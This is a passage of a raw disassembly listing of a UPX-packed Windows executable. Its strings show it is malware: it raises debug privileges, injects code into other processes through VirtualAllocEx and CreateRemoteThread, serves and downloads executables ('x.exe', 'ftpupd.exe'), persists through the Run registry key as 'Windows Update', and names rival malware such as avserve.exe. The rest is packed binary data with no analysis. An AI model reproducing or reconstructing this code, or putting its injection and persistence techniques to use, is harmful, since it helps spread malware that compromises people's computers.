; ---------------------------------------------------------------------------
loc_30904C70: ; DATA XREF: sub_309017D2+44A�o
jmp short loc_30904C78
; ---------------------------------------------------------------------------
jmp short loc_30904C7A
; ---------------------------------------------------------------------------
align 8
loc_30904C78: ; CODE XREF: UPX0:loc_30904C70�j
; DATA XREF: sub_309017D2+5C�o
pop esp
pop esp
loc_30904C7A: ; CODE XREF: UPX0:30904C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_30904C84 dd 1CEC8166h ; DATA XREF: sub_309017D2+D�r
dword_30904C88 dd 0E4FF07h ; DATA XREF: sub_309017D2+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_30901D39+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_30901D39+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_30901D39+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_30901D39+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_30901D39+8�o
; sub_30902383+132�o
align 10h
aUterm17 db 'uterm17',0 ; DATA XREF: sub_30901DC1:loc_30901EA6�o
; UPX0:30902322�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_30901DC1+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_30901DC1:loc_30901E08�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_30901DC1+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_30901DC1+18�o
align 4
dword_30904D38 dd 0E9F3F5h ; DATA XREF: sub_3090204F+112�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3090204F+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3090204F+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3090204F+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3090204F+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3090230D�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_30902383+139�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_30902383+12B�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_30902383+124�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_30902383+117�o
align 4
aU17 db 'u17',0 ; DATA XREF: sub_30902383+105�o
aU16 db 'u16',0 ; DATA XREF: sub_30902383+F9�o
aU15 db 'u15',0 ; DATA XREF: sub_30902383+ED�o
aU14 db 'u14',0 ; DATA XREF: sub_30902383+E1�o
aU13i db 'u13i',0 ; DATA XREF: sub_30902383+D5�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_30902383+C9�o
aU12 db 'u12',0 ; DATA XREF: sub_30902383+BD�o
aU11 db 'u11',0 ; DATA XREF: sub_30902383+B1�o
aU10 db 'u10',0 ; DATA XREF: sub_30902383+A5�o
aU9 db 'u9',0 ; DATA XREF: sub_30902383+99�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_30902383+8D�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_30902383+81�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_30902383+75�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_30902383+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_30902383+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_30902383+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_30902383+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_30902383+3B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_30902383+22�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_309026E9+2D�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_30902195+23�o
; sub_309029BD+5F�o ...
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_30902195+1C�o
; sub_30902A6B+87�o ...
align 10h
aEeedtqfdbhbqod db 'eeedtqfdbhbqod',0 ; DATA XREF: sub_309015C7+4F�o
; sub_30902B37+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_30902B37+32�o
aClient db 'Client',0 ; DATA XREF: sub_30902B37+BC�o
; sub_30902B37+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_30902B37+37�o
; sub_30902B37+75�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_309029BD+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_309029BD+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_309029BD+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_309029BD+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_309029BD+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_309029BD+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_309029BD+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_309029BD+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_309029BD+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_309029BD+F�o
align 4
a1: ; DATA XREF: sub_30902B37+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_30904FB8 dd 0 ; DATA XREF: sub_3090204F+C7�r
; sub_30902195+80�w
dword_30904FBC dd 0 ; DATA XREF: sub_309015C7+43�r
; sub_3090169C+5B�o ...
dword_30904FC0 dd 0 ; DATA XREF: sub_3090204F+79�r
; sub_3090204F:loc_309020FD�r ...
dword_30904FC4 dd 44h ; DATA XREF: sub_30901DC1+C2�r
; UPX0:3090232D�w ...
dword_30904FC8 dd 0 ; DATA XREF: sub_3090236F+2�r
; sub_30902383+33�w
dword_30904FCC dd 0 ; DATA XREF: sub_30902195+E0�w
; sub_309026E9+20�r
dword_30904FD0 dd 30900000h ; DATA XREF: sub_30901DC1+6�r
; UPX0:30902312�w
dword_30904FD4 dd 0 ; DATA XREF: sub_309015C7+49�r
; sub_3090169C+52�o ...
dword_30904FD8 dd 0 ; DATA XREF: UPX0:30902786�w
; UPX0:30902798�w
word_30904FDC dw 0 ; DATA XREF: sub_30902536+3B�r
; sub_3090259A:loc_309025FB�r ...
align 10h
dword_30904FE0 dd 0 ; DATA XREF: sub_30902B37+25�w
; sub_30902B37+110�w
align 20h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 30905000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30905000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:30906B11�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 4D000201h
dd 40D47Eh, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 10h, 5000000h, 23h
dd 10h, 40h, 309000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 50h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 4000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 26000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 0E4000000h, 0Fh, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 0C000040h, 0C300002Fh, 4D000044h
dd 164868A0h, 8695B9AEh, 3D7D0302h, 9F6801A7h, 0BB21B736h
dd 4A20E676h, 5AB7CC3Ah, 0E43DB91Bh, 7684E066h, 0F42A706Ah
dd 7364796h, 0C8608CA4h, 97640A5Eh, 1939F0D9h, 2800847Ah
dd 4B003FA2h, 2ECDCB59h, 0C8B26C3Ch, 0A723BD98h, 167E2B2h
dd 3E500FDCh, 7EE8685Ch, 0ACA70DFCh, 0D328C00Dh, 431B138Ch
dd 0E54008C9h, 0EDCD2484h, 0DB0C7A04h, 0B212C5F8h, 0D62D5221h
dd 39EDB1Ch, 402EFDD9h, 4C7012DEh, 2719F844h, 40BCC06Ch
dd 1BDE5044h, 0D6336F5h, 94B71E10h, 0EEB6970Dh, 812193BFh
dd 0E87CACF9h, 1624A580h, 0B0250600h, 687E9F25h, 1C9D1C52h
dd 99DE1276h, 96F47258h, 650AEF36h, 4B1E7C6Ah, 7BC89C36h
dd 91BE490Ch, 0C93C3E49h, 90E1547Bh, 0DD92EDCCh, 8C9FE924h
dd 0CF782449h, 364052EDh, 0F88248CCh, 3331150Ch, 66F4C2C2h
dd 8707A02h, 9A85D0E8h, 0F4455E74h, 180B9D5Fh, 1C22F89Ah
dd 7F24E46Dh, 0FB5D07A8h, 5A4353Eh, 571282F8h, 0B0ACBF37h
dd 5A745781h, 74F80E14h, 8B74684Bh, 9BA09312h, 7E3D749Fh
dd 0FE709696h, 0A041209Ah, 73FC55FFh, 0FD859EDh, 50E4B9E8h
dd 0D59628ACh, 0E5BABF4h, 551802F0h, 3B0009F8h, 8CB303B1h
dd 0F47558E4h, 0C8718725h, 8B1807C1h, 7AD0D00Dh, 6FFDDFEDh
dd 3C418B00h, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 92FB818Ah, 1C68D8B4h, 9765D81Bh, 0F0C6966Ah, 868A301h
dd 0EC706312h, 0ED74ECF0h, 1110D70Dh, 9D1B0E82h, 14096C9Ah
dd 8B4DC2F4h, 0F8E1645Dh, 18185051h, 5A2A6897h, 1B15283Ah
dd 0CA115DB0h, 0D1AAEB03h, 0EB346B58h, 76AB57C4h, 599BB60Ch
dd 7C7DF055h, 3E4574CFh, 0EA5D4B3Eh, 500251F0h, 35ACEF53h
dd 0B84F07C4h, 0FAD68C27h, 6AD06A17h, 7789FF53h, 0C73BEC55h
dd 0EB290574h, 0C785CD1Bh, 684C90D8h, 0E59F60Eh, 0D5EB05FCh
dd 7B9CD0Ch, 49EF7408h, 0E86E1909h, 51513021h, 310F6000h
dd 144B2269h, 250D2D1Ah, 0B42BAEB8h, 0B1AFDD0Dh, 0FECB213h
dd 0B1133AE9h, 0F9C22D59h, 12BCB66Ah, 3C9EDC4Bh, 0A8500C80h
dd 614B7D50h, 2C50774Dh, 20195DC0h, 0A44598B7h, 7CAC437Ch
dd 51B8B024h, 0E2AA148Bh, 0AC96177Eh, 1A67FFFEh, 8861C280h
dd 3B461E14h, 80E97CF7h, 5D003B24h, 9ABADB78h, 2E445C54h
dd 57AC5A5Fh, 0A6030356h, 0A066DBCEh, 0B112732Fh, 0F0DCA5DDh
dd 56501950h, 8078AA00h, 77ACDC26h, 0F41EC495h, 71ED6DD1h
dd 0CFA6849h, 0D9C7FFF0h, 8936D32h, 2ACC3434h, 35AE4C2Eh
dd 0A753DB3h, 20BC500Ah, 27C2C01Ah, 0C6541874h, 3B7FB807h
dd 0B5BE3901h, 0C40452Fh, 801008Bh, 24448D51h, 0B36C265Fh
dd 113021D8h, 245903D3h, 9F09DD0Eh, 0BBCC1507h, 2FC82007h
dd 8678FF6Ch, 0F8C8E433h, 8510E7C1h, 0CF361A0Bh, 20087C8h
dd 33125D8Bh, 8E01C8E0h, 3393D2C4h, 951D5920h, 0B4B4C653h
dd 11DAAF66h, 25214537h, 4D6D3C3h, 0E7198370h, 0CCDB5ADh
dd 0F017B3C8h, 37359541h, 6899DC66h, 6C683D98h, 4FC044B7h
dd 63362C0Dh, 4D54FE47h, 8598BAA5h, 54DA149Bh, 81BF007Ch
dd 0A134775Fh, 7900B933h, 0C13BC72Bh, 0EDEE0272h, 0C18BDD76h
dd 0A1292BE1h, 0C70318B8h, 0C4B4AC23h, 3D9D52DFh, 6A117223h
dd 1B46F878h, 0EB4F6785h, 50E113C4h, 9EC9E446h, 1ED4112Dh
dd 3C681594h, 0DDC9AC59h, 3868030Bh, 0ACC73C97h, 533AB6B3h
dd 83525354h, 0D188FC12h, 0C29824D0h, 0DB04F404h, 57303347h
dd 0D0B1C8F4h, 86B6A7DDh, 0BF4ECDD9h, 68066068h, 0DDEEDB6h
dd 1D898068h, 55182784h, 0ADC014ECh, 0D489753Dh, 536200F2h
dd 0D26B027Bh, 3A01B304h, 0CD7780BCh, 0C54A39Ah, 0D5741A4Dh
dd 2F28D9E1h, 0CA3DCCDh, 9DE9784Ch, 0A4FEA336h, 565153FCh
dd 6B674B62h, 68D83A86h, 0FBE32656h, 5EF93370h, 10C25819h
dd 0A8499A05h, 56C05E69h, 0B7E80C4Bh, 895E93BFh, 50DEC5Dh
dd 1FFF25FFh, 0A1C33A04h, 0A3DD837Fh, 0E77443CCh, 84CC8A1Fh
dd 50DF74C9h, 0F57C666Bh, 3042EA26h, 90AFA540h, 646516E9h
dd 5F7B440Ch, 0A6BE8FEAh, 1FD814F8h, 4F689E48h, 2F670A20h
dd 1F0F09C7h, 0CF53E2EBh, 0B30455Fh, 904312E6h, 66DA7001h
dd 3CAEEBDDh, 11D6B033h, 3CD8023Eh, 0D6E61E98h, 68B4803Ah
dd 8CC115B0h, 0D0A3AB6Dh, 0C37C74E0h, 7B80EC66h, 0E41AC4A3h
dd 6652B73Dh, 4504ECF7h, 350D29E0h, 1AB91904h, 1BFB3826h
dd 23836833h, 0EBE4BD13h, 27DAFD8Dh, 997F1386h, 44C83569h
dd 3049C870h, 60403958h, 0B1C3AB90h, 4468D012h, 7AD89CF3h
dd 6C3816CDh, 0FC1543A3h, 0D72BFEC0h, 1BF61868h, 342404C7h
dd 640640Bh, 1C242C64h, 6406406h, 0C8080C14h, 0E4F3480h
dd 190004F6h, 0FC0E4B90h, 1F4F84Dh, 0EC019019h, 190190E8h
dd 0DCE0E490h, 0F42FC1F3h, 748D3959h, 4DD46839h, 0C989A8B1h
dd 0CC3D26D8h, 73C4064Dh, 0DD261217h, 0AA0BC0Dh, 7E472E49h
dd 6857D512h, 50F2195h, 0E0F1169Ch, 2745C822h, 876B9448h
dd 65D859F4h, 18FE5714h, 0EBA21388h, 824F0A09h, 311570E3h
dd 0C6D6CB5h, 695B091Ch, 0C2ABA480h, 0B37F8047h, 0B458A51h
dd 1EBB70A5h, 32FF7B0Eh, 4C3A52DBh, 38314D05h, 0ADF108FEh
dd 88253F5Dh, 7A90B5Dh, 35B70FCEh, 19FC06DCh, 99BAA4E0h
dd 0D603FEF7h, 0E32D97A3h, 80C3FE7Fh, 0BD72FFFBh, 7662C05Eh
dd 6ACC09D9h, 33750A5Fh, 1C2B6D68h, 84F5832h, 0D8040A81h
dd 0E201EDACh, 75950B09h, 63B04DA4h, 0D00F7586h, 0F2322536h
dd 8996CED6h, 0FF84323Dh, 86DFD703h, 81430F5Ah, 9F9C29FBh
dd 355D875Fh, 8426358Bh, 9E0C737Bh, 0A260D32Bh, 5B062FECh
dd 73B6DF3Ch, 0FEFF04FDh, 362D3CFCh, 887FCD7Eh, 8BC66BF7h
dd 0D9F93BA9h, 0DCB0EC59h, 0A0A33EAAh, 12CF9E57h, 572F3B01h
dd 59F8DC9Ch, 6C8712B7h, 0C1FF9A13h, 47EE75B3h, 0F812F0D6h
dd 0A6271068h, 0C0D3BED3h, 9E61E0E0h, 0A9337084h, 4B098996h
dd 0C81E4E56h, 0B15D3019h, 0B05C708Fh, 7AF07CCFh, 0CC4052F8h
dd 8301B90Bh, 68B0036Fh, 10414E4Ch, 0F0097B11h, 42BA2D6Eh
dd 80C60F6Ch, 9361600Bh, 0A43FDFEBh, 57935655h, 59DE0331h
dd 19E6D48Ah, 0E1A19871h, 1F0CA551h, 1BBBF4FDh, 14683624h
dd 0BF66753h, 38506A02h, 66816FF6h, 5325DD8h, 740096D2h
dd 35CC0918h, 711BD1Eh, 14190510h, 141C2776h, 6D84F00h
dd 6DAAE516h, 0C34FC207h, 0D5530D74h, 861051C7h, 17088407h
dd 18244C39h, 1B61DB3Ah, 0ED85EDFAh, 22AB117Eh, 144D2C26h
dd 0DDB064EFh, 0A2059661h, 750DF2EBh, 96E841DAh, 0DDEB65h
dd 23333F68h, 212E0583h, 0DF150C9Ch, 0AF0588D9h, 1408106Eh
dd 421C1BA9h, 182F5135h, 0D8D80256h, 183D90B2h, 3D563EF6h
dd 5C6311CEh, 182ADC74h, 0B74B2C61h, 2050D905h, 0FC081810h
dd 39C0B62h, 550F5EB0h, 575AC68Bh, 0AE759A2h, 182C562Eh
dd 53CEC990h, 27005556h, 845ACE59h, 0C520A2Bh, 9262CF04h
dd 0B55D0C03h, 89E20128h, 0DE5320C3h, 0F6F44E27h, 8E40B713h
dd 1E3C3A94h, 794E365Ch, 3E21D6F7h, 0F8DF0A38h, 0C960A433h
dd 687AEF16h, 7AD86035h, 0FAF66811h, 1B201210h, 0A604F77Ch
dd 477DF21Ch, 11E748Dh, 60FFFC81h, 1F563D02h, 0B5FF1C24h
dd 97905CE0h, 0FF4B457Ah, 0E1521F0Fh, 8D999B0h, 0EC465060h
dd 99D03876h, 0B789BDABh
dd 0E6E48038h, 0D00F5ED8h, 7C03C757h, 68D40624h, 72391C8Eh
dd 44DC50D8h, 30E43CE0h, 472391E7h, 0CEC18E8h, 0D14EF0F0h
dd 0F4CC1934h, 0A7DB0E0h, 0E26163BFh, 0F8BE637Ch, 51A28B7Dh
dd 3C18A164h, 3608B3C8h, 7571CBD8h, 1D200E17h, 9E9AA64Dh
dd 83370108h, 975B6A2h, 0B0448A46h, 0F4697881h, 74B08C47h
dd 5874AD09h, 81636A88h, 0AE598BB3h, 1BA184BBh, 3FC17A2Fh
dd 8303E083h, 9D5605C0h, 4A8B86B9h, 10C8CD52h, 186E459Dh
dd 0D6D73D11h, 0EE661C3Dh, 38140E26h, 0EF4250E1h, 0A161982Ch
dd 0CA402040h, 3E684B7Ch, 0B306AEC6h, 0D885CC59h, 25D31441h
dd 0F454CFA1h, 0E007B701h, 0F40962Bh, 88E76F84h, 0C5173EC1h
dd 14C7481Fh, 6DC017F7h, 52E02558h, 1D6AE0B2h, 71B8BF50h
dd 0C21840F5h, 743F51DCh, 0E8185737h, 0BB0A3060h, 1983CC77h
dd 52D1F628h, 0BC10F453h, 0CDFB9A53h, 0B1383D62h, 0CE590FEBh
dd 0F6CE8105h, 0EB68B632h, 96C0E374h, 0BB2665E2h, 0B3739868h
dd 0D4DC0D65h, 0DB9BB46h, 0B40D60B3h, 5EE2671Ah, 0EC6F4C12h
dd 0E74957A4h, 3BBBC631h, 90CCB64h, 0E0AE2CFDh, 118B790Bh
dd 0EB0C4807h, 0D1880E15h, 9CD6062h, 2BA1EA18h, 0C5C5053h
dd 0C5B34433h, 684FF83Eh, 11136A76h, 42A66E40h, 0FF00CCDFh
dd 0F8052105h, 199EFA10h, 1BF0F479h, 0DF7D5100h, 8D9A91A8h
dd 8114720Bh, 0B72D0BE9h, 4FB1E25h, 73170185h, 0C4312BECh
dd 23E18B0Ch, 8BD5BB5Bh, 5004E908h, 5C644353h, 63636100h
dd 495805h, 22C02A00h, 4BF1F110h, 20628F3h, 41535224h
dd 0FFFF8031h, 1BF4B77h, 838DF501h, 0EC527911h, 0F63AE42Ah
dd 0EA9B49E7h, 21AFBEE0h, 0FFFFFFFFh, 95447EDBh, 32615E1Ah
dd 6A1F85A0h, 94FF949Fh, 26A68439h, 1DCE358Fh, 0BC9A55Ch
dd 72657AB2h, 407FFFFFh, 7A6F4DABh, 616C6C69h, 302E342Fh
dd 6F632820h, 7461706Dh, 0FFF6B7FFh, 656C6269h, 534D203Bh
dd 36204549h, 69570915h, 776F646Eh, 544E2073h, 0FBA81776h
dd 312E3520h, 0BEE43429h, 104D400h, 0E79E7BC4h, 0A00EB47Bh
dd 4748090h, 0EFBE79E7h, 9580E68h, 6F743C48h, 0D49EC9B2h
dd 22204530h, 86FF4A10h, 309E7Ch, 631340F8h, 6C2E7676h
dd 72DB6B7Bh, 777E75h, 6C646507h, 0FF0F6597h, 666DFEF6h
dd 657365C1h, 68637261h, 6F721F0Eh, 63786F62h, 7376FF68h
dd 676E61E5h, 74651FD2h, 2E64720Ch, 7A6962h, 0B7C8DB0Bh
dd 68632861h, 0C6D616Bh, 0DB2D0674h, 78B17376h, 6C060024h
dd 37620E6Fh, 0DB7DED6Bh, 76264766h, 742E7A02h, 1111B76h
dd 74FB185Bh, 6E2E706Fh, 730F6917h, 0DB01FE27h, 788D330Ah
dd 7564610Fh, 652D746Ch, 1766FDB6h, 8072694Bh, 0A66E6F33h
dd 15804E73h, 2E74EDBEh, 694F6762h, 0B6FF3267h, 7800FBF6h
dd 6A2C6177h, 0AD6262h, 66617A9Bh, 6DF09161h, 5D2EA867h
dd 0AF5C2365h, 0FFFEDDBh, 64636261h, 68676665h, 6C6B6A69h
dd 71C56E6Dh, 0F975F772h, 76F8DFFFh, 7A797877h, 43424154h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 61FF5150h, 55547FB4h
dd 59585756h, 68231B5Ah, 3A707474h, 0CDF82F2Fh, 7325D81Dh
dd 97652F0Bh, 7068702Eh, 7DBF3D3Fh, 0F3D0E5Bh, 6E637326h
dd 69266406h, 8376666Eh, 3BBEDB94h, 2637313Dh, 0A01B7413h
dd 7B5DFDEBh, 313D58B0h, 1A83732h, 30383A31h, 7F652F30h
dd 0DFF646C0h, 0DFE800DFh, 66C9335Dh, 0EDB7FFB9h, 8D01EEFFh
dd 0FE8B0575h, 993C068Ah, 2C064607h, 99344630h, 0E2470788h
dd 1A17FBEDh, 0E80AEBF4h, 65DFAEDAh, 93712E67h, 0F701C999h
dd 12FF6FFFh, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0A91C14BAh, 0D8FF1A98h, 0F3C9FBADh, 8608F198h, 10C07102h
dd 37CB5F90h, 0C9965992h, 1CD9FD87h, 0E4143A78h, 0A7D7157h
dd 0CE45713Ah, 0F3F6DF7Dh, 8904F19Dh, 9C04F109h, 0C7764011h
dd 67B391FEh, 10F0E3F3h, 0B20BDC1Ch, 0C99B6059h, 0F7FB1EC7h
dd 14D90125h, 0CA17A104h, 8D2B9E71h, 230BD968h, 0AD9161CBh
dd 1D96E21Ah, 0B6CF2811h, 50B2F6B7h, 149900C8h, 255557DCh
dd 0F6A44E12h, 0C0F6EF6Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 1C3B71CBh, 7EEEC3D9h, 21E424FFh, 0CDCDCF1Ah, 812C668Fh
dd 0B64FFDDBh, 0B0FB1E3Fh, 0CDC383B8h, 0C9A85D12h, 0D93F1DCBh
dd 0AD2537CEh, 485A0B24h, 0FF6596A6h, 14C0B264h, 0A7294C1Bh
dd 0BA9CF3EBh, 0D9FBECFFh, 0F43416E9h, 0FCF57126h, 133BF90Eh
dd 0FF4629EFh, 6BFBBB37h, 66DE5F37h, 0AEA8EC47h, 0C5B70116h
dd 0ECE9EDFFh, 0B087DDE9h, 0FCB7FDF7h, 0CA012CE1h, 5AFCFCF5h
dd 0DFFFF2F2h, 0F7EBFCFEh, 0ABAAF5FCh, 0F934C7D6h, 25B459AAh
dd 0C9662A2Ah, 819093ACh, 0B3F85FB7h, 639D90FFh, 71CDC983h
dd 19BF3092h, 0D9145135h, 91720A95h, 76107FFFh, 0EBC8712Ah
dd 0D512A5D2h, 529AE180h, 8D146FAAh, 7F6F9A2Ah, 0B9C8FDA3h
dd 4A9A8B12h, 0AB9EC347h, 0A319DB9Bh, 0A26CEC20h, 0FFFEDFFFh
dd 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h, 0EB8D2E96h
dd 9A85D812h, 99D125Ah, 0E68584FFh, 0F8105A9Ah, 4922D096h
dd 0FEFD7F66h, 0B7B76D12h, 5AA987DDh, 850295C2h, 91048212h
dd 0DCF7CB5Ah, 0CFA033FCh, 53FF857Fh, 1872424Dh, 0FA5FC853h
dd 0FEFF84E7h, 50020062h, 54458343h, 0ADF64F57h, 4B52FFF1h
dd 4F525020h, 4D415247h, 17CD3120h, 4D4E414Ch, 4875A902h
dd 66AB0AB1h, 0DB4BB715h, 6B035BADh, 7075BB67h, 611A330Eh
dd 75BA5B0Fh, 32234D27h, 32322158h, 69AC2E32h, 0D6319533h
dd 323C2018h, 0E464AD8Bh, 773A419h, 42EDF60Dh, 23FF0C52h
dd 0A110400h, 0ED6F2014h, 0D4058D46h, 4C0069D0h, 5053534Bh
dd 443F8248h, 88297B7h, 0BB94AE0h, 57F6FCh, 64006E24h
dd 756F00h, 6F643A73h, 3074B62Fh, 398C0901h, 36233500h
dd 1D4B6E60h, 0DA00072Eh, 0E79019ABh, 0DA200844h, 49C19D57h
dd 39F26h, 0C80F46F2h, 47238360h, 64007h, 73FFE806h, 1F011023h
dd 0E0888A15h, 4F0048h, 0FFFEC044h, 6A19FE8Dh, 49E4F27Ah
